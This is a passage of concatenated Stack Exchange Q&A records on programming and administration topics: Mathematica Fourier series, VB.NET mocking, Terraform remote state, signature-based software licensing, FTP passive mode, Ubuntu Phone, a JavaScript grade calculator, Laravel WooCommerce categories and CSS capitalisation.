Piecewise[{\n {FourierCoefficient[f[x], x, 0, FourierParameters -> fp], # == 0},\n {ComplexExpand@FourierCoefficient[f[x], x, #, FourierParameters -> fp], True}\n }] &;\n fc = Evaluate \/@ fc;\n];\n<\/code>\nThe output (<code>fc<\/code>) of this is something very unpleasant to look at; however, there's nothing Fourier-related left there, all the hard math has been done already, and only a bunch of elementary functions remain. <code>fc<\/code> is now a function of one argument that gives you the $n$-th Fourier coefficient of <code>f<\/code> in no time.\n<code>(* Calculate the first 2001 Fourier coefficients *)\nAbsoluteTiming[Table[fc[n], {n, -1000, 1000}]] \/\/ First\n<\/code>\n\n<code>0.777059 seconds\n<\/code>\n\nTo convert this back to the function, you have to do the partial sum with your hands, for example here are the second, fourth and eightieth partial sums:\n<code>myPartialSums = Table[\n (* The Pi\/2 compensates for the custom FourierParameters, see\n documentation of FourierSeries\/FourierParameters\n under \"more info\" *)\n Re[Sum[fc[k] Exp[-Pi\/2 I k t], {k, -n, n}]],\n {n, {2, 4, 80}}\n];\n<\/code>\n\n<code>A very large output has been generated,\nbut we're luckily not interested in it\nanyway but would rather plot it\n<\/code>\n\n<code>Plot[\n {f[t]} ~Join~ myPartialSums,\n {t, -10, 10},\n PlotRange -> All, \n Evaluated -> True, \n PlotStyle -> {Thick, Automatic, Automatic, Automatic}\n]\n<\/code>\nAnswer: If the summation index goes from 1 to n, as you suggested (?) above, and you make the mod to the Plot function I mentioned\n<code>s[n_, x_] := 8\/4 + 3\/(9 \u03c0) Sum[(6 (-1)^k)\/(k \u03c0) Cos[(k \u03c0 x)\/\n 2] + (16 (-1)^k + 13)\/(\u03c0 k) Sin[(k \u03c0 x)\/2], {k, 1, n}]\n\npartialsums = Table[s[n, x], {n, 1, 5}];\n\nf[x_] = Piecewise[{{-x^3 - 2 x, -2 < x < 0}, {-1 + x, 0 <= x <= 2}}]\n\nPlot[Evaluate@Tooltip[Append[partialsums, f[x]]], {x, -4 Pi, 4 Pi}]\n<\/code>\nThen you get the following figure:\nComment: Your plot is running into a known issue with mma which I can't seem to find a reference to. Since `Plot` has the `Attribute` `HoldAll`, it is treating `Append[partialsums, f[x]]` as a single function, and hence colors all the lines the same color. To get around this either use `Evaluate@Append[...]` or `Plot[#, ...]& @ Append[...]`.\nComment: @nightowl and David, I found the [discussion](http:\/\/mathematica.stackexchange.com\/q\/1731\/52) on this.\nComment: Interesting-I was wondering about that! Thanks!\nComment: Thats nice David. I was wondering what was going on with the colors. I was fooling around with it to get something like this and then I seen that rcollyer figured it out. Thank You, that will be a useful option to remember when doing these. Thank You! `:)`\n","meta":{"source":"mathematica.stackexchange","title":"Plotting Partial Sums of Fourier Series","dup_signals":{}},"subset":"stackexchange"} +{"text":"Pass an Mock object to class\n\nQuestion: \nIn below code block i need to use the object of class RETTemplateLoader(created as \"obiz\") inside method of \"obizEmail.GetEmailContent\", hence i created the Mock for class BizCampaignEmailSend(created as \"obizEmail\") but i don't find how to link this two objects so that while the method \"GetEmailContent\" gets invoked, i'm expecting it return <code>\"<HTML>\"<\/code>(my hard coded text)\n<code><TestMethod(), Owner(\"TestEmail\"), TestCategory(\"Testing\")> _\n Public Sub GetEmailContent()\n Using oClass As New SessionClass(\"UnitTesting\", Me.GetType.Name)\n Dim oSvcJPEmailProductsCampaignStruct As New SvcJPEmailProductsCampaignStruct\n 'Class obj 1\n Dim obiz = MockRepository.GeneratePartialMock(Of RETTemplateLoader)(New Object() {\"\", \"\", \"\", False})\n obiz.Stub(Function(c) c.LoadEmailTemplateNew(oClass)).Return(\"<HTML>\")\n 'Class obj 2\n Dim obizEmail = MockRepository.GeneratePartialMock(Of BizCampaignEmailSend)()\n Assert.AreEqual(obizEmail.GetEmailContent(oClass , oSvcJPEmailProductsCampaignStruct), \"<HTML>\")\n End Using\n End Sub\n<\/code>\nHere is my method which i need to give test coverage\n<code>Public Overridable Function GetEmailContent(ByVal oClass As SessionClass, ByVal oCampaignStruct As SvcJPEmailProductsCampaignStruct) As String \n Dim sEmailTemplate As String = String.Empty\n Dim oRETTemplateLoader As New RETTemplateLoader(oCampaignStruct.CampaignContent, \"\", oCampaignStruct.AutoResponseDID, True)\n sEmailTemplate = oRETTemplateLoader.LoadEmailTemplateNew(oClass)\n Return sEmailTemplate\nEnd Function\n<\/code>\nAnswer: I don't think you need to do any linking here. You don't need to call your SUT (System Under Test) as mock object in this case. I don't see benefit of setting up a stub for returning \"\" by invoking \n\noRETTemplateLoader.LoadEmailTemplateNew(oClass)\n\nand then having a mock object for your SUT which calls the above method and expecting it to return what you have mocked already. Your SUT doesn't have much behaviour.\nThe only thing I would suggest it to verify whether the oRETTemplateLoader.LoadEmailTemplateNew(oClass) is called.\nSomething like below. (Note I'm not VB.NET expert but you should be able to fix any syntax errors. I 'll just show my intention.)\n<code> <TestMethod(), Owner(\"TestEmail\"), TestCategory(\"Testing\")> _\nPublic Sub GetEmailContent()\n Using oClass As New SessionClass(\"UnitTesting\", Me.GetType.Name)\n Dim oSvcJPEmailProductsCampaignStruct As New SvcJPEmailProductsCampaignStruct\n 'Set your expectation\n Dim obiz = MockRepository.GeneratePartialMock(Of RETTemplateLoader)(New Object() {\"\", \"\", \"\", False})\n obiz.Expect(Function(c) c.LoadEmailTemplateNew(oClass)).Return(\"some string\")\n\n 'Call SUT\n Dim sut As New BizCampaignEmailSend\n Dim r = sut.GetEmailContent(oClass , oSvcJPEmailProductsCampaignStruct)\n\n 'Verify\n obiz.VerifyAllExpectations()\n End Using\nEnd Sub\n<\/code>\n","meta":{"source":"stackoverflow","title":"Pass an Mock object to class","dup_signals":{}},"subset":"stackexchange"} +{"text":"Terraform - Using a config file for referencing backend data\n\nQuestion: The documentation explains that you can use a config file when setting up your backend. You partially configure the backend as part of your main.tf file and then point it towards a config file inline as part of the terraform init command.\nThis works okay, but when it comes to accessing data from this backend it seems as though you have to hardcode in the access credentials. I'm wondering essentially if there's any way for me to point the backend to its config file as part of my main.tf file. Something like this:\n<code>data \"terraform_remote_state\" \"vnet\"\n{\n backend = \"azurerm\"\n\n config {\n key = \"path\/to\/state\/file\"\n file = \"path\/to\/config\/file.tf\"\n }\n}\n<\/code>\nIf this feature exists I can't find the documentation for it. Am I missing something or is it just not possible right now?\nComment: As far as I know that's not possible right now. A lot of the remote state use cases can now be more nicely handled with data source instead (although I'm not so sure about the state of the `azurerm` provider) so I'd recommend using that where possible.\nAnswer: I am doing exactly what you are asking and I run everything from Cloud Shell. I keep everything in Github repos and then pull the repo down to a folder in my Cloud Shell. Here is how...\nFirst, create a shell script that has the following lines in it:\n<code>#!\/bin\/bash\nset -eo pipefail\n\n# The block below will grab the access key for the storage account that is used\n# to store state files\n\nsubscription_name=\"Infrastructure\"\ntfstate_storage_resource_group=\"terraform-state-rg\"\ntfstate_storage_account=\"dosinvesttfstatesa\"\n\naz account set --subscription \"$subscription_name\"\ntfstate_storage_access_key=$(\n az storage account keys list \\\n --resource-group \"$tfstate_storage_resource_group\" \\\n --account-name \"$tfstate_storage_account\" \\\n --query '[0].value' -o tsv\n)\n\necho \"\"\necho \"Terraform state storage account access key:\"\necho $tfstate_storage_access_key\necho \"\"\n\nterraform apply \\\n -var \"tfstate_access_key=$tfstate_storage_access_key\"\n<\/code>\nSecond, add the lines below to your main.tf file to read in the data from your backend:\n<code>data \"terraform_remote_state\" \"rg\" {\n backend = \"azurerm\"\n\n config {\n storage_account_name = \"${var.tfstate_storage_account}\"\n container_name = \"${var.tfstate_container}\"\n key = \"${var.tfstate_rgstate_file}\"\n access_key = \"${var.tfstate_access_key}\"\n }\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"Terraform - Using a config file for referencing backend data","dup_signals":{}},"subset":"stackexchange"} +{"text":"Creating a license system based on asymmetric encryption (RSA or ECDSA)\n\nQuestion: I've spent a couple of days researching the topic of creating a license system for my desktop software. While I fully understand that there's no perfect copy protection, this approach seems to have the best balance for me.\nThere are a couple of details that I can't fully get my head around before starting with the implementation. I'd really appreciate if you could share your thoughts on the following topics:\n\n1. Encrypt or Sign? (answered -> sign)\nIn my understanding both encrypting and signing the license information on my server-side with my private key would work. The desktop client would either have to decrypt or verify the signature of the license text-file with the embedded public key. The only difference I see is that in the latter case the content of the license file is humanly readable while the encrypted version is not. \nWould you rather encrypt or sign the license file? Why?\n\n2. Hash or directly encrypt\/sign the License? (answered -> signing automatically hashes it)\nLet's say the license information text consists of about 300 bytes. Would you recommend to sign\/encrypt it directly, or hash it and then sign\/encrypt the hash? I'm asking this because I've read different statements that asymmetric encryption isn't suitable for large data. But what's the limit?\n\n3. Revoke a License?\nWhat's the best way to revoke an already issued license? I understand that having an online blacklist is probably the most accurate solution, however I don't want the software to be dependent on an Internet connection and the reliability of my server. So I guess the alternative is to have black-listed licenses within the application being maintained with new releases? In that case what exactly would I create a list of? The signed\/encrypted license (probably too big with a growing list)? A hash of it? Something completely different?\n\nEdit:\nCombining the replies so far I guess the first two questions can be combined to \"Sign it and don't care about the content length\".\nThe third question however remains unclear to me. I'd like to point out that I don't want to have a dependance on an online server for not bothering honest customers. After all forced online connections bring more annoyance than security.\nSo there needs to be kind of an \"offline solution\", even if less secure. Please reconsider question #3 under this aspect.\nActually I'd even like to extend question #3 by the following scenario:\n4. Replace stolen\/hacked private key\nIn a worst case scenario the private key might get stolen or somehow hacked, so the attacker is able to create a license generator himself. What would I have to do in this case? I can't blacklist some licenses like in #3, so instead I'd have to replace the key pair, wouldn't I? However in my understanding that would also mean that all customers would require to receive new licenses when updating to a new version with the replaced public key. Is there some clever solution for only blacklisting licenses with the old key pair that have been created after a certain date so the already created licenses before some date stay intact? I understand that it'd require some kind of timestamp system that an attacker can't fake. Is there such a thing?\n\nThank you!\nComment: No, I mean that in case I find out that a license is being abused (e.g. shared on the Internet) I'd like to invalidate\/revoke it. I'll edit my question accordingly.\nComment: For scenario #4, approach that is simple and has been used in practice is whitelisting. Note: The whitelist can get very large.\nComment: @user4982 What exactly would I whitelist? The issued licenses? In that case I'd have to release a new version of the software after each purchase!?\nAnswer: Sign the license text. There's nothing confidential in the license text, so you don't need confidentiality.\nIf possible, include some kind of customer ID or something in the license that links it to a particular customer.\nStandard digital signature schemes can easily sign arbitrary-length messages. Don't worry about the length of the message. (Internally, they hash the message with a collision-resistant cryptographic hash, then sign the hash, roughly speaking, which is how they can handle arbitrary-length messages efficiently. But you shouldn't need to know that, if you are using a standard implementation of a well-vetted crypto algorithm.)\nOne approach to revocation is to have your client software contact a central server for periodic download of the revocation list. The alternative is to have your server issue short-lived signed authorizations, and require the client to periodically contact the server when each one expires to get a new one (and the server can withhold providing any new authorizations once you revoke that customer). In either case, make sure that the client can continue to use your software for some set period while they are offline without destroying their access to the software, or your customers might become very mad at you.\nThere is no purely offline solution to revocation. If the customer has no network connectivity, there's no way to revoke their software license early. If in the absence of revocation their software license would be valid until time $T$, and at time $t<T$ you want to revoke them, you can't. Consider: from the client's perspective, there is nothing that lets them distinguish between whether they are revoked or not, if they don't have any communication whatsoever with the server or anyone else. So if you expect clients to be offline, it becomes a tradeoff between \"the lifetime of a license\" (how long before it expires?) vs \"speed of revocation\" (how long before revocation takes effect?). If you issue licenses that are good for one year, then revocation won't take effect until that year is up -- if clients are offline.\nWhat you can do is refuse to provide software upgrades to clients whose software has been upgraded. This won't prevent them from continuing to use the older version of the software, though, for as long as their license is valid. Optionally, you could also have the client software try to connect to the Internet whenever possible, and if the client goes for a certain time period without having being able to reach the server, you could have the client disable itself; whether this is acceptable will depend upon how you expect your legitimate customers will use your software.\nIf your private signing key is stolen, you are hosed. There's nothing you can do to prevent whoever holds that signing key from generating illegitimate licenses that the existing version of your software will accept as valid. All you can do is change the public key that's hardcoded into the software, in the next software update (so people won't be able to use that newer version of software using licenses signed by the old stolen key) -- but this won't stop people from using the older version of your software. So try to not let your signing key get stolen.\nFinally, remember that these licensing schemes provide a speedbump, not strong security. They exist to keep honest people honest, but they will not be effective at deterring or stopping dedicated malicious people from bypassing your copy protection system. Therefore, whatever you do, try to ensure that your license system doesn't inconvenience honest users too much. Don't drive them to download pirated copies because they're less annoying than the actual paid-up copy.\nComment: I fully agree with you. You basically confirmed my personal thoughts which makes it easier for me to proceed. Also you're right that I *shouldn't need* to know the technical background, but to create a solid solution it really helps to have a good background understanding. If possible please have another look at my question #3 again as it remains unclear to me. I actually extended it with a related question #4. I'd like to hear your thoughts about this.\nComment: @CodeX, sure. I expanded my answer to elaborate further on revocation (your question #3) and stolen private keys (your question #4).\nAnswer: First off: if you sign the licensing information server-side what keeps hundreds of users from using the same license? I\u00b4d rather create asymmetric key pairs and provide the private key along with an ID as the license code. The client can then proove to the server that it owns a valid license. This already ansewers question 3: revoking a license can be easily done server-side. Also, preventing a software from going online is a lot harder than provide a working serial. (while still easy for the ones who know how).\nFor question 1:\nI think signing is the best option when working in the way i described above.\nThis also answers question two: when the client needs to proove to your server that it owns a valid license, only a small amount of data needs to be signed. This can be a fixed number, e.g. $e^{20}$. Hashing is not required. You could even leave the padding since buying your software is most likely cheaper than the easiest attacks on a cryptographic key.\nP.S.: Most serial codes consist of about 24 characters. In Hex-Notation this only gives you a 96 bit key. However, if you encode it base-36 (so 0-Z), you can fit 124 bit into 24 characters.\nComment: If you \"create asymmetric key pairs and provide the private key along with an ID as the license code\" $\\hspace{.17 in}$ \"what keeps hundreds of users from using the same license\" code? $\\;$\nComment: By not accepting the license code if another program with the same id is already running.\nComment: That would make it an \"always on\" software, which in my experience every user (including me) hates. I'd like to have a reasonable protection while not annoying honest customers.\nComment: @marstato : $\\:$ Anyone could just change the ID, since it's not tied to anything else they have. $\\hspace{.85 in}$\nComment: @CodeX: if the software cannot connect to your server you just consider the license valid.\nRickDemer: The ID is tied to a license. The software sends its ID and signed data, the server checks the signature with the correspponding public-key.\nComment: @marstato : $\\;\\;\\;$ What signed data? $\\:$ Since the license-holder has the private key for their key-pair, the license-holder could sign _any_ ID with that. $\\;\\;\\;\\;\\;\\;\\;$\nComment: What the data is, is not really important. Still, ID and License key are bound together. Say i am User 10815 and my license key is ABCDF487. I sign a some data (a timestamp or my id or whatever) with that key. Then i send ID and key to the server. The server then checks the signature with the public-key related to the ID. If that signature is valid i have proven to own **the** license for that ID.\nComment: _provide the private key_ : **NO!**, the private key is, indeed, private, and must be kept secret!\nComment: @gog did you understand how i intend to use the key in this scheme? Its never used for encryption and is never supposed to be.\nComment: I _think_ I understood it. And it still feels completely wrong to me to distribute a private key: since the user owns the private key, it can sign **any** ID with that. So, what is the point in signing the ID? Simply provide the ID to the user, then let him send it to the server. I think you are using cryptography in a wrong way here. The only one that should have the right to sing something here is the licensing server.\nComment: @gog i intend the private key to enable a license holder to proof having a valid license without giving a man-in-the-middle the chance to get hold of the actual license. I agree that distributing private keys is bad; however letting licence holders generate their own key pairs and send the public key in doesn't fit OPs requirement of distributing licenses.\nComment: If you are worried about a MITM, you have a _secret_ that you want to send to the server. And, sending a secret to the server is accomplished by _encrypting_ the plaintext (ID) with the **public** key, not the private one. But the MITM is a totally different problem here.\nAnswer: The problem with DRM is that the keys must be revealed to the end user machine and thus susceptible to interception. Not to mention I believe that the Sony PlayStation uses ECDSA to secure its firmware and it got cracked. \nComment: Sony got its \"DRM\" system cracked [because of their poor implementation of the ECDSA asymmetric cryptography](https:\/\/arstechnica.com\/gaming\/2010\/12\/ps3-hacked-through-poor-implementation-of-cryptography\/). The main difference between symmetric and asymmetric cryptography is that you don't need to share a single secret key between \"writer\" and \"reader\", but there is a private one and a public one (that can be shared).\n","meta":{"source":"crypto.stackexchange","title":"Creating a license system based on asymmetric encryption (RSA or ECDSA)","dup_signals":{}},"subset":"stackexchange"} +{"text":"FTP issues with FTP inbound channel adapter\n\nQuestion: Our project we are using ftp:inbound-channel-adapter to poll files from the FTP server.it working fine.But in between the polling is not working.when i see the FTP server logs i see \"425 Can't open data connection.\" now when i restart or stop and start the ftp:inbound-channel-adapter again its polling properly.This issue is repeatedly occurring to solve i need to stop\/start the ftp:inbound-channel-adapter.ftp:inbound-channel-adapter is running in linux OS.\nAm using spring-integration 3 just to more clear i have included the xsd info \n(spring-integration-3.0.xsd,spring-integration-ftp-3.0.xsd)\nis there any specific client mode i need to set for FTP i.e Active(local\/remote) \/Passive(local\/remote) etc?\nbelow my ftp:inbound-channel-adapter configuration \n<code><bean id=\"ftpClientFactory\" class=\"org.springframework.integration.ftp.session.DefaultFtpSessionFactory\">\n <property name=\"host\" value=\"abcd.com\"\/>\n <property name=\"port\" value=\"21\"\/>\n <property name=\"username\" value=\"userid\"\/>\n <property name=\"password\" value=\"password\"\/>\n <\/bean>\n\n<int-ftp:inbound-channel-adapter id=\"ftpInbound\"\n channel=\"ftpChannel\"\n session-factory=\"ftpClientFactory\"\n auto-create-local-directory=\"true\"\n delete-remote-files=\"true\"\n remote-directory=\"\/\" \n local-filename-generator-expression=\"new java.text.SimpleDateFormat('yyyy-MM-dd-hhmmssSSS').format(new java.util.Date()) + '.'+ #this\" \n local-directory=\"${ftp.sync.folder}\"\n remote-file-separator=\"\/\">\n <\/int-ftp:inbound-channel-adapter>\n<\/code>\nso not sure i can do something in the FTP server.but i like to see is there any option in ftp:inbound-channel-adapter or any thing you guy suggest so that whenever FTP server throws \"425 Can't open data connection.\" instead of manually stop\/start the ftp:inbound-channel-adapter is there any option or automatic way to make this work.Thanks\nAdded info on spring integration version and ftp session factory.\nComment: Please show your Spring Integration version and add your session factory configuration to the question.\nAnswer: There are 2 ways to connect to the FTP server active and passive mode.\nActiveMode : where FTP server has to made Data Connection with the port mentioned by the Client\n(firewall issues if port is blocked by fire wall and you will get 425 Data Connection error)\nPassivemode : Where client has to made Data connection with the port mentioned by the FTP server.\n(no fairwall issues in the client side.Also we can configure the passvieports in FTP server and made these ports not block by FTP servers firewall.)\nIf you not specify any clientmode in ftpsessionfactory it defaults to the Active mode i.e clientMode=0.\nSo i have firewall issue which causes 425 data connection issue.After i OFF the firewall its worked well.So now i changed my FTPsessionfactory to use Passivemode so FTP server never cares about clients Firewall\n<code><bean id=\"ftpClientFactory\" class=\"org.springframework.integration.ftp.session.DefaultFtpSessionFactory\">\n <property name=\"host\" value=\"abcd.com\"\/>\n <property name=\"port\" value=\"21\"\/>\n <property name=\"username\" value=\"userid\"\/>\n <property name=\"password\" value=\"password\"\/>\n<!-- 2 passive mode -->\n<property name=\"clientMode\" value=\"2\"\/>\n<\/bean>\n<\/code>\nThis way never cares about client's firewall.\nvery good post about FTP http:\/\/slacksite.com\/other\/ftp.html\n","meta":{"source":"stackoverflow","title":"FTP issues with FTP inbound channel adapter","dup_signals":{}},"subset":"stackexchange"} +{"text":"Will I be able to run Java, C or Python natively in Ubuntu Phone as I would on a PC?\n\nQuestion: the Ubuntu Phone by Meizu is released tomorrow for the European audience. I've been looking around for information on it, but the only I can find are some hand on reviews, that don't answer the most important - for me - thing: The Ubuntu phones are (or will be?) supposed to be turned into a fully fledged desktop system once connected to an external screen. Therefore I assume that the user will be able to run and compile programs as they would, on a non-mobile Ubuntu system.\nSo my question is, will the Ubuntu Phone OS in the new phone by Meizu (MX4) be able to do that?\nWill I be able to install C\/Python\/Java etc on it, the way I would on a desktop\/laptop and compile or run the equivalent programs?\nIf that feature is not available yet in the Ubuntu Phone OS, is anyone aware whether there are plans for it to be implemented?\nThanks!\nAnswer: I have a BQ Aquarius E4.5 running Ubuntu 15.04 (r23). It comes with Python 3 (just remember to start \"python3\" - \"python\" does not exist and does not symlink to Python 3) so that's a start.\nI can't see any gcc, cc, or Java on the phone, and no hits on \"gcc\" or \"compiler\" or \"java\" in the Ubuntu Store. If you make the file system read-write you should be able to install all kinds of stuff directly via apt-get but will then lose out on the over-the-air updates as I understand it. However, for developer work that is probably OK ?\nComment: You can already get to a root prompt via sudo, for instance run `sudo su -`. But you can't install packages with `apt-get` because the file system is read-only.There is some more information about it here: [link](http:\/\/askubuntu.com\/questions\/380258\/how-to-change-the-ubuntu-installation-to-read-write-mode-on-a-mobile-device) but I don't know how up-to-date that information still is. I haven't dared try it myself yet.\nComment: Wow, very interesting that python3 would run out of the box! Can you elaborate on \"making the file system read-write\"? Do you mean running as root?\n","meta":{"source":"askubuntu","title":"Will I be able to run Java, C or Python natively in Ubuntu Phone as I would on a PC?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Issues with displaying answer of calculations in java\/html Grade Calculator\n\nQuestion: I seem to be having issues with the display of the answers, I need a Letter grade in one box and the number grade in the other when the calculations button is clicked.\nBut neither wants to display, I have tried <code>onclick<\/code> several ways but nothing works.\nI have done what I can and am so confused as to why its not working.\n\n<code>function calculategrades() {\n var letterGrade = \"F\";\n if (number <= 59)\n letterGrade = \"F\";\n else if (number >= 60 && number <= 66)\n letterGrade = \"D\";\n else if (number >= 67 && number <= 69)\n letterGrade = \"D+\";\n else if (number >= 70 && number <= 76)\n letterGrade = \"C\";\n else if (number >= 77 && number <= 79)\n letterGrade = \"C+\";\n else if (number >= 80 && number <= 86)\n letterGrade = \"B\";\n else if (number >= 87 && number <= 89)\n letterGrade = \"B+\";\n else if (number >= 90 && number <= 100)\n letterGrade = \"A\";\n return letterGrade;\n}\n\nfunction grade() {\n var test1 = parseFloat(document.getElementById('test').value * 0.20);\n var test2 = parseFloat(document.getElementById('test2').value * 0.20);\n var finalexam = parseFloat(document.getElementById('exam').value * 0.30);\n var labs = parseFloat(document.getElementById('labs').value * 0.25);\n var project = parseFloat(document.getElementById('project').value * 0.25);\n var quizzes = parseFloat(document.getElementById('quiz').value * 0.5);\n var total = test1 + test2 + finalexam + labs + project + quizzes;\n var display = document.getElementById('numbergrade');\n}<\/code>\n<code><form>\n <table>\n <thead>\n <tr>\n <th colspan=\"2\">Score<\/th>\n <\/tr>\n <\/thead>\n <tr>\n <td>Test 1<\/td>\n <td><input type=\"number\" name=\"test\" id=\"test\" \/><\/td>\n <\/tr>\n <tr>\n <td>Test 2<\/td>\n <td><input type=\"number\" name=\"test2\" id=\"test3\" \/><\/td>\n <\/tr>\n <tr>\n <td>Final Exam<\/td>\n <td><input type=\"number\" name=\"exam\" id=\"exam\" \/><\/td>\n <\/tr>\n <tr>\n <td>Labs<\/td>\n <td><input type=\"number\" name=\"labs\" id=\"labs\" \/><\/td>\n <\/tr>\n <tr>\n <td>Project<\/td>\n <td><input type=\"number\" name=\"project\" id=\"project\" \/><\/td>\n <\/tr>\n <tr>\n <td>Quizzes<\/td>\n <td><input type=\"number\" name=\"quiz\" id=\"quiz\" \/><\/td>\n <\/tr>\n <tr>\n <td colspan=\"4\" style=\"text-align: center\"><input type=\"button\" name=\"total\" id=\"total\" value=\"Calculate\" onclick=\"grades()\" \/><\/td>\n <\/tr>\n <tfoot>\n <tr>\n <th><input type=\"text\" name=\"numbergrade\" id=\"numbergrade\" \/><\/th>\n <th><input type=\"text\" name=\"lettergrade\" id=\"lettergrade\" \/><\/th>\n <\/tr>\n <\/tfoot>\n <\/table>\n\n\n<\/form><\/code>\nComment: 1. You never pass a grade number to your function calculategrades() or call it from your button\nComment: You mean call the function? Such as onclick=\"calculategrades()\" ? And pass a grade number?\nComment: Btw this is JavaScript and html not java.\nAnswer: Try this, just a guess? do to the way you code is posted I can not test.\nchange \n<code>var display = document.getElementById('numbergrade');\n<\/code>\nto \n<code>document.getElementById(\"numbergrade\").innerHTML = total;\n<\/code>\nthen call calculategrades() passing total into it so it has something to work with.\nthen change\n<code>return letterGrade;\n<\/code>\nto \n<code>document.getElementById(\"lettergrade\").innerHTML = lettergrade;\n<\/code>\nAnswer: Here are your fixed codes\n\n<code>function calculateGrades(number) {\n var letterGrade = \"F\";\n if (number <= 59)\n letterGrade = \"F\";\n else if (number >= 60 && number <= 66)\n letterGrade = \"D\";\n else if (number >= 67 && number <= 69)\n letterGrade = \"D+\";\n else if (number >= 70 && number <= 76)\n letterGrade = \"C\";\n else if (number >= 77 && number <= 79)\n letterGrade = \"C+\";\n else if (number >= 80 && number <= 86)\n letterGrade = \"B\";\n else if (number >= 87 && number <= 89)\n letterGrade = \"B+\";\n else if (number >= 90 && number <= 100)\n letterGrade = \"A\";\n return letterGrade;\n}\n\nfunction grade() {\n var test1 = parseFloat(document.getElementById('test').value * 0.20);\n var test2 = parseFloat(document.getElementById('test3').value * 0.20);\n var finalexam = parseFloat(document.getElementById('exam').value * 0.30);\n var labs = parseFloat(document.getElementById('labs').value * 0.25);\n var project = parseFloat(document.getElementById('project').value * 0.25);\n var quizzes = parseFloat(document.getElementById('quiz').value * 0.5);\n var total = test1 + test2 + finalexam + labs + project + quizzes;\n return total;\n}\n\nfunction showGrades() {\n var number = grade();\n var letter = calculateGrades(number);\n document.getElementById('numbergrade').value = number;\n document.getElementById('lettergrade').value = letter;\n}<\/code>\n<code><form>\n <table>\n <thead>\n <tr>\n <th colspan=\"2\">Score<\/th>\n <\/tr>\n <\/thead>\n <tr>\n <td>Test 1<\/td>\n <td><input type=\"number\" name=\"test\" id=\"test\" \/><\/td>\n <\/tr>\n <tr>\n <td>Test 2<\/td>\n <td><input type=\"number\" name=\"test2\" id=\"test3\" \/><\/td>\n <\/tr>\n <tr>\n <td>Final Exam<\/td>\n <td><input type=\"number\" name=\"exam\" id=\"exam\" \/><\/td>\n <\/tr>\n <tr>\n <td>Labs<\/td>\n <td><input type=\"number\" name=\"labs\" id=\"labs\" \/><\/td>\n <\/tr>\n <tr>\n <td>Project<\/td>\n <td><input type=\"number\" name=\"project\" id=\"project\" \/><\/td>\n <\/tr>\n <tr>\n <td>Quizzes<\/td>\n <td><input type=\"number\" name=\"quiz\" id=\"quiz\" \/><\/td>\n <\/tr>\n <tr>\n <td colspan=\"4\" style=\"text-align: center\"><input type=\"button\" name=\"total\" id=\"total\" value=\"Calculate\" onclick=\"showGrades()\" \/><\/td>\n <\/tr>\n <tfoot>\n <tr>\n <th><input type=\"text\" name=\"numbergrade\" id=\"numbergrade\" \/><\/th>\n <th><input type=\"text\" name=\"lettergrade\" id=\"lettergrade\" \/><\/th>\n <\/tr>\n <\/tfoot>\n <\/table>\n\n\n<\/form><\/code>\n\nYou had mistyped a lot and also you never called the function calculateGrades and did not accept argument in calculateGrades so you were using some global variable \"number\" and you did not set the result of function grade as value to numbergrade\nComment: nice work Petr I was just muddling my way thru that missing function\nComment: THAT WORKED! Thanks. I initially added the number but it didn't work. It does now!\n","meta":{"source":"stackoverflow","title":"Issues with displaying answer of calculations in java\/html Grade Calculator","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can't attach USB Device in VirtualBox Error Message\n\nQuestion: I'm trying to connect to a 32 bit Windows 10 virtual machine on my MacBook. However I am receiving the error messages in the picture below. My VirtualBox version is 7.0.10.\n\nI have:\n\nEnabled USB 3.0\nInstalled the extension pack for 7.0.10\nEjected the flash drive from my host machine\n\"Insert Guest Additions CD image\" does nothing\n\nAny help is appreciated.\nAnswer: Fixed it. I had to download an older version of Virtual Box.\n","meta":{"source":"stackoverflow","title":"Can't attach USB Device in VirtualBox Error Message","dup_signals":{}},"subset":"stackexchange"} +{"text":"Laravel Corcel WooCommerce - Add product categories\n\nQuestion: I am using the laravel package \"corcel\/woocommerce\" and I am trying to attach product categories to the created product.\n<code> $product = Product::create([\n 'post_title' => 'Product name',\n 'post_content' => 'Post description',\n 'post_status' => 'publish',\n 'post_type' => 'product'\n ]\n );\n $product->createMeta([\n '_sku' => '1234',\n '_regular_price' => '10.00',\n '_sale_price' => '5.00',\n '_thumbnail_id' => 10\n \/\/ other wp_postmeta product meta values...\n ]);\n<\/code>\nHere is where I am trying to add a category:\n<code>$product->categories()->create([\n'cat_name' => 'Test'\n]);\n<\/code>\nBut I get the following error:\n<code> Illuminate\\Database\\Eloquent\\MassAssignmentException \n\n Add [cat_name] to fillable property to allow mass assignment on [Corcel\\WooCommerce\\Model\\ProductCategory][.][1]\n<\/code>\nDoes anyone have any ideas about how I can attach a WooCommerce category to the product please?\nAnswer: in your model <code>ProductCategory<\/code> you should define the $fillable attribute to support mass assignment:\n<code>class ProductCategory extends Model\n{\n protected $fillable = ['cat_name']; \/\/ not only cat_name but also all fillable attributes\n}\n<\/code>\nif you can't change the ProductCategory model, the change the way you save it:\n<code>$productCategory= new ProductCategory();\n$productCategory->cat_name='test'; \/\/ if the is another required attributes, fill them.\n$productCategory->save();\n$product->categories()->attach($productCategory->id);\n<\/code>\nComment: Thank you for your suggestion. `ProductCategory` is within the Corcel package and when I changed this, it didn't work unfortunately. I believe this would be good if I wasnt using the package.\nComment: I suggest then changing the way you create ProductCategory, try the update answer\nComment: Thank you so much for your help, unfortunately this didnt work. I know normally in Laravel this would work. I have left an issue request on the [github repo](https:\/\/github.com\/corcel\/woocommerce\/issues\/21). I didnt know if anyone had used this package before.\n","meta":{"source":"stackoverflow","title":"Laravel Corcel WooCommerce - Add product categories","dup_signals":{}},"subset":"stackexchange"} +{"text":"Does text-transform: Capitalize work for elements, and if so in which browsers?\n\nQuestion: I have a <code><select><\/code> element within which I would like to Capitalize the text displayed in each <code><option><\/code> tag.\nFor instance, I would like the 2 values here to be Bar and Baz (not bar and baz)\n<code><style>\n option { text-transform: Capitalize; }\n<\/style>\n\n<select name=\"foo\">\n <option value=\"bar\">bar<\/option>\n <option value=\"baz\">baz<\/option>\n<\/select>\n<\/code>\nThis does not appear to work in my Chrome (14.0.835.202) but does work in my Firefox (8.0) and IE 8.\nEdit: Added <code><style><\/code> tag for clarity\nComment: The title of your question mentions \"text-transform: Capitalize\", but the text of the question doesn't show how you're using it. Just `select option { text-transform: capitalize; }`?\nComment: Works if you style 'select' now in Chrome.\nComment: Apparently this was an ongoing bug for Chrome and has been corrected in 16 + 17, but I can't verify as I'm still on 15: http:\/\/code.google.com\/p\/chromium\/issues\/detail?id=31349\nComment: This has since stopped working in FF, works in chrome 